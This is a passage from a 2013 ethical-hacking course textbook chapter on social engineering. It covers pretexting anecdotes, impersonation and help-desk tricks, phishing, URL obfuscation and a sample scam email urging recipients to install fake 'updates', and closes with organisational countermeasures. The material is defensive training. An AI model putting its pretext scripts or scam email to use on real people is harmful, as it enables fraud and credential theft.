engineers rely on the fact that people are not aware of the value of the
information they possess and are careless about protecting it.
Frequently, social engineers will search dumpsters for valuable

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 340

 Ethical Hacking Part I

information, memorize access codes by looking over someone's shoulder

(shoulder surfing), or take advantage of people's natural inclination to
choose passwords that are meaningful to them but can be easily
guessed.

Security experts propose that as our culture becomes more dependent on

information, social engineering will remain the greatest threat to any
security system. Prevention includes educating people about the value of
information, training them to protect it, and increasing people's
awareness of how social engineers operate.171

Social engineering is a nontechnical method of breaking into a system or

network. It’s the process of deceiving users of a system and convincing
them to give out information that can be used to defeat or bypass
security mechanisms. Social engineering is important to understand
because hackers can use it to attack the human element of a system and
circumvent technical security measures. This method can be used to
gather information before or during an attack.

Social Engineering Term

Social engineering is the use of influence and persuasion to deceive

people for the purpose of obtaining information or persuading a victim to
perform some action. A social engineer commonly uses the telephone or
Internet to trick people into revealing sensitive information or to get them
to do something that is against the security policies of the organization.
By this method, social engineers exploit the natural tendency of a person
to trust their word, rather than exploiting computer security holes. It’s
generally agreed that users are the weak link in security; this principle is
what makes social engineering possible.

The following is an example of social engineering recounted by Kapil

Raina, currently a security expert at Verisign, based on an actual
workplace experience with a previous employer. “One morning a few
years back, a group of strangers walked into a large shipping firm and
walked out with access to the firm’s entire corporate network. How did
they do it? By obtaining small amounts of access, bit by bit, from a

171
http://searchsecurity.techtarget.com/definition/social-engineering
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 341
 Ethical Hacking Part I

number of different employees in that firm. First, they did research about
the company for two days before even attempting to set foot on the
premises. For example, they learned key employees’ names by calling HR.
Next, they pretended to lose their key to the front door, and a man let
them in. Then they “lost” their identity badges when entering the third
floor secured area, smiled, and a friendly employee opened the door for
them. The strangers knew the CFO was out of town, so they were able to
enter his office and obtain financial data off his unlocked computer. They
dug through the corporate trash, finding all kinds of useful documents.
They asked a janitor for a garbage pail in which to place their contents
and carried all of this data out of the building in their hands.

The strangers had studied the CFO’s voice, so they were able to phone,
pretending to be the CFO, in a rush, desperately in need of his network
password. From there, they used regular technical hacking tools to gain
super-user access into the system.

In this case, the strangers were network consultants performing a

security audit for the CFO without any other employees’ knowledge. They
were never given any privileged information from the CFO but were able
to obtain all the access they wanted through social engineering.”

The most dangerous part of social engineering is that companies with

authentication processes, firewalls, virtual private networks, and
network-monitoring software are still wide open to attacks, because
social engineering doesn’t assault the security measures directly.
Instead, a social-engineering attack bypasses the security measures and
goes after the human element in an organization.

23.2 Social Engineering methods for hacking

Social engineering includes the acquisition of sensitive information or

inappropriate access privileges by an outsider, based on the building of
inappropriate trust relationships. The goal of a social engineer is to trick
someone into providing valuable information or access to that
information. It preys on qualities of human nature, such as the desire to
be helpful, the tendency to trust people, and the fear of getting in
trouble. Hackers who are able to blend in and appear to be a part of the
organization are the most successful at social-engineering attacks. An
example of the using the social engineering is illustrated in the following
example.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 342

 Ethical Hacking Part I

The facilitator of a live Computer Security Institute demonstration

showed the vulnerability of help desks when he dialed up a phone
company, got transferred around, and reached the help desk. “Who’s the
supervisor on duty tonight?” “Oh, it’s Betty.” “Let me talk to Betty.” [He’s
transferred.] “Hi Betty, having a bad day?” “No, why? Your systems are
down.” She said, “My systems aren’t down, we’re running fine.” He said,
“You better sign off.” She signed off. He said, “Now sign on again.” She
signed on again. He said, “We didn’t even show a blip, we show no
change.” He said, “Sign off again.” She did. “Betty, I’m going to have to
sign on as you here to figure out what’s happening with your ID. Let me
have your user ID and password.” So this senior supervisor at the help
desk tells him her user ID and password. In a few minutes a hacker is
able to get information that might have taken him days to get by
capturing traffic and cracking the password. It is much easier to gain
information by social engineering than by technical methods. People are
usually the weakest link in the security chain. A successful defense
depends on having good policies in place and teaching employees to
follow the policies. Social engineering is the hardest form of attack to
defend against because a company can’t protect itself with hardware or
software alone.172

23.3 Common Types Of Attacks

Social engineering can be broken into two common types:

 Human-based Human-based social engineering refers to person-

to-person interaction to retrieve the desired information. An
example is calling the help desk and trying to find out a password.

 Computer-based Computer-based social engineering refers to

having computer software that attempts to retrieve the desired
information. An example is sending a user an e-mail and asking
them to reenter a password in a web page to confirm it. This social-
engineering attack is also known as phishing.

We’ll look at each of these more closely in the following sections.

172
http://www.symantec.com
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 343
 Ethical Hacking Part I

23.3.1 Human-Based Social Engineering

Human-based social engineering techniques can be broadly
categorized as follows:

i. Impersonating an employee or valid user In this type of social-

engineering attack, the hacker pretends to be an employee or valid
user on the system. A hacker can gain physical access by
pretending to be a janitor, employee, or contractor. Once inside the
facility, the hacker gathers information from trashcans, desktops,
or computer systems.

ii. Posing as an important user In this type of attack, the hacker

pretends to be an important user such as an executive or high-
level manager who needs immediate assistance to gain access to a
computer system or files. The hacker uses intimidation so that a
lower-level employee such as a help-desk worker will assist them
in gaining access to the system. Most low-level employees won’t
question someone who appears to be in a position of authority.

iii. Using a third person Using the third-person approach, a hacker

pretends to have permission from an authorized source to use a
system. This attack is especially effective if the supposed
authorized source is on vacation or can’t be contacted for
verification.

iv. Calling technical support Calling tech support for assistance is a

classic social-engineering technique. Help-desk and technical
support personnel are trained to help users, which makes them
good prey for social-engineering attacks.

v. Shoulder surfing Shoulder surfing is a technique of gathering

passwords by watching over a person’s shoulder while they log in
to the system. A hacker can watch a valid user log in and then use
that password to gain access to the system.

vi. Dumpster diving Dumpster diving involves looking in the trash for
information written on pieces of paper or computer printouts. The
hacker can often find passwords, filenames, or other pieces of
confidential information.

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 344

 Ethical Hacking Part I

A more advanced method of gaining illicit information is known as

reverse social engineering. Using this technique, a hacker creates a
persona that appears to be in a position of authority so that employees
ask the hacker for information, rather than the other way around. For
example, a hacker can impersonate a help-desk employee and get the
user to give them information such as a password.

23.3.2 Computer-Based Social Engineering

Computer-based social engineering attacks can include the following:

 Mail/IM attachments: An attacker can send malicious attachments

to an innocent victim via mail/IM.
 Pop-up windows: Pop-up windows simulate an urgent condition on
a user’s computer and request sensitive information to restore it to
the normal state.
 Spam mail: Spam mail can contain fraudulent billing information,
etc. and can make payment requests or ask for other information.
 Web sites: Fake Web sites can be used to request confidential
information such as the password or social security number of
financial institutions.

i. Phishing

Phishing involves sending an e-mail, usually posing as a bank, credit-

card Company, or other financial organization. The e-mail requests that
the recipient confirms banking information or reset passwords or PIN
numbers. The user clicks the link in the e-mail and is redirected to a
fake website. The hacker is then able to capture this information and use
it for financial gain or to perpetrate other attacks. E-mails that claim the
senders have a great amount of money but need your help getting it out
of the country are examples of phishing attacks. These attacks prey on
the common person and are aimed at getting them to provide bank
account access codes or other confidential information to the hacker.

ii. On-Line Social Engineering

The Internet is fertile ground for social engineers looking to harvest
passwords. The primary weakness is that many users often repeat the
use of one simple password on every account: Yahoo, Travelocity, and
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 345
 Ethical Hacking Part I

Gap.com, whatever. So once the hacker has one password, he or she

can probably get into multiple accounts. One way in which hackers
have been known to obtain this kind of password is through an on-
line form: they can send out some sort of sweepstakes information
and ask the user to put in a name (including e-mail address – that
way, she might even get that person’s corporate account password as
well) and password.
Another way hackers may obtain information on-line is by pretending
to be the network administrator, sending e-mail through the network
and asking for a user’s password. This type of social engineering
attack doesn’t generally work, because users are generally more aware
of hackers when online, but it is something of which to take note.
Furthermore, pop-up windows can be installed by hackers to look like
part of the network and request that the user reenter his username
and password to fix some sort of problem. At this point in time, most
users should know not to send passwords in clear text (if at all), but it
never hurts to have an occasional reminder of this simple security
measure from the System Administrator. Even better, sys adman’s
might want to warn their users against disclosing their passwords in
any fashion other than a face-to-face conversation with a staff
member who is known to be authorized and trusted.
iii. E-mail can also be used for more direct means of gaining access to a
system. For instance, mail attachments sent from someone of
authenticity can carry viruses, worms and Trojan horses. A good
example of this was an AOL hack, documented by VIGILANTe: “In that
case, the hacker called AOL’s tech support and spoke with the
support person for an hour. During the conversation, the hacker
mentioned that his car was for sale cheaply. The tech supporter was
interested, so the hacker sent an e-mail attachment ‘with a picture of
the car’. Instead of a car photo, the mail executed a backdoor exploit
that opened a connection out from AOL through the firewall.”173

iv. Online Scams

Some websites that make free offers or other special deals can lure a
victim to enter a username and password that may be the same as those
they use to access their work system. The hacker can use this valid

173
http://www.symantec.com/connect/articles/social-engineering-fundamentals-
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 346
 Ethical Hacking Part I

username and password once the user enters the information in the
website form.

Mail attachments can be used to send malicious code to a victim’s

system, which could automatically execute something like a software
keylogger to capture passwords. Viruses, Trojans and worms can be
included in cleverly crafted e-mails to entice a victim to open the
attachment. Mail attachments are considered a computer-based social
engineering attack. Here is an example of an e-mail scam which tries to
convince the receiver to open an unsafe attachment:

Mail server report:

Our firewall determined the e-mails containing worm copies are being sent
from your computer.

Nowadays it happens from many computers, because this is a new virus

type (Network Worms).

Using the new bug in the Windows, these viruses infect the computer
unnoticeably.

After the penetrating into the computer the virus harvests all the e-mail
addresses and sends the copies of itself to these e-mail addresses.

Please install updates for worm elimination and your computer restoring.

Best regards,
Customer support service

Pop-up windows can also be used in computer-based engineering

attacks, in a similar manner to e-mail attachments. Pop-up windows
with special offers or free stuff can encourage a user to unintentionally
install malicious software.

v. URL Obfuscation

URL is the Uniform Resource Locator and is commonly used in the

address bar of a web browser to access a particular website. In lay terms
it is the website address. URL obfuscation is the hiding or a fake URL in
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 347
 Ethical Hacking Part I

what appear to be a legitimate website address. For example, a website of

204.13.144.2/Citibank may appear to be a legitimate web address for
Citibank but in fact is not. URL obfuscation is used in phishing attacks
and some online scams to make the scam seem more legitimate. A
website address may be seen as an actual financial institution name or
logo, but the hyperlink leads to a fake website or IP address. When the
user clicks the hyperlink, they’re redirected to the hacker’s site.
Addresses can be obfuscated in malicious links by the use of
hexadecimal or decimal notations.

23.4 Social-Engineering Countermeasures

Some best practices to help you reduce the risk of a social engineering
attack against your organization being successful.

1. Never disclose passwords

This is fairly common sense, but ensures that you have policies in place
to never disclose passwords. Regularly inform staff that they should
never be asked for their password. Finally ensure that you do not have
any exceptions to this policy. If it is sometimes okay to give a password
your users need to make a judgment call and a clever social engineer will
find ways to exploit this. It is easy if the answer is always no.

2. Limit IT Information being disclosed

Create a policy that only IT is able to discuss existing technology with
outsiders and designate a person to take survey and vendor calls about
the company's technology. A common technique is for the social engineer
to call one person in the company as a survey company and learn what
products are in use and then use that knowledge to represent themselves
as a vendor or support person for a product that is used.

Politely decline to participate in surveys and if someone represents

themselves as your vendor on an unsolicited call call back your vendor
contact to verify that the contact was legitimate.

3. Limit information in Out Of Office Messages

If you’re out of office reply messages leave the company limits the
amount of information provided. Don't directly give alternate contact
names or numbers with direct lines or exact lengths of outages. You

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 348

 Ethical Hacking Part I

should instead direct people to call the receptionist who can provide
information as needed. Never tell outsiders you will be unreachable.

If a social engineer knows that you haven't been in the office for a week
and some other people to call they can act as if they were in an active
conversation and if you indicated you cannot be reached they may imply
promises were made and expect them fulfilled.

4. Escort guests in areas with Network Access

Do not leave guests alone in empty offices, waiting rooms, or conference
rooms with direct network access, especially if they are not someone
known to you. For all you know the vendor presentation they scheduled
was a ruse allow them internal access to your network and run attacks.

5. Question people you don't know

If you see someone you are unfamiliar with in your company and they
are not displaying a badge question their presence. This can be done
professionally. For example introduce yourself and ask them what brings
them to your company today. If people are too afraid to question
strangers it makes your company very easy to break in to.

6. Talk about security

Regularly talk to people about security and awareness so that they are
thinking about attacks. A good social engineer appears harmless so if
you are not on your guard and keeping your employees thinking about
what they say and do it is easy for an attack to succeed.

7. Centralize reporting of suspicious behavior

Finally, have an individual or small group that is made aware of any
suspicious behavior, A social engineer will typically contact multiple
people to gather enough information to launch an attack counting on the
fact that they will not communicate with one another. If a patter s
detected that looks like an attack it is much easier to prevent harm.

Being able to identify how to combat social engineering is critical for any
certified ethical hacker. There are a number of ways to do this.

Documented and enforced security policies and security-awareness

programs are the most critical component in any information-security
program. Good policies and procedures aren’t effective if they aren’t
taught and reinforced to employees. The policies need to be
communicated to employees to emphasize their importance and then
Copyright 2013 Intelligent Quotient System Pvt. Ltd. 349
 Ethical Hacking Part I

enforced by management. After receiving security-awareness training,

employees will be committed to supporting the security policies of the
organization.

The corporate security policy should address how and when accounts are
set-up and terminated, how often password are changes, who can access
what information and how violations or the policy are to be handled.
Also, the help desk procedures for the previous tasks as well as
identifying employees for example using an employee number or other
information to validate a password change. The destruction of paper
documents and physical access restrictions are additional areas the
security policy should address. Lastly, the policy should address
technical areas such as use of modems and virus control.

One of the advantages of a strong security policy is that it removes the

responsibility of employees to make judgment calls regarding a hacker’s
request. If the requested action is prohibited by the policy, the employee
has guidelines for denying it.

The most important countermeasure for social engineering is employee

education. All employees should be trained on how to keep confidential
data safe. Management teams are involved in the creation and
implementation of the security policy so that they fully understand it and
support it throughout the organization. The company security-awareness
policy should require all new employees to go through a security
orientation. Annual classes should be required to provide refreshers and
updated information for employees.

Another way to increase involvement is through a monthly newsletter

with security awareness articles.

***********************

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 350

 Ethical Hacking Part I

References

http://www.security.ku.edu/docs/doc-viewer.jsp?id=27
http://www.livinginternet.com/ttoc_site.htm
http://e-words.us/w/Script.html
http://www.tropicalpcsolutions.com/html/security/malware/vbs-
dlRB.html
http://62nds.com/pg/e90.php
http://www.trap17.com/index.php/Nasty-Windows-Tricks-Vbs-
Codes_t53888.html
http://www.linuxjournal.com/article/6701
http://en.wikipedia.org/wiki/Buffer_overflow
http://www.penetration-testing.com/
http://www.securityfocus.com/infocus/1852

Copyright 2013 Intelligent Quotient System Pvt. Ltd. 351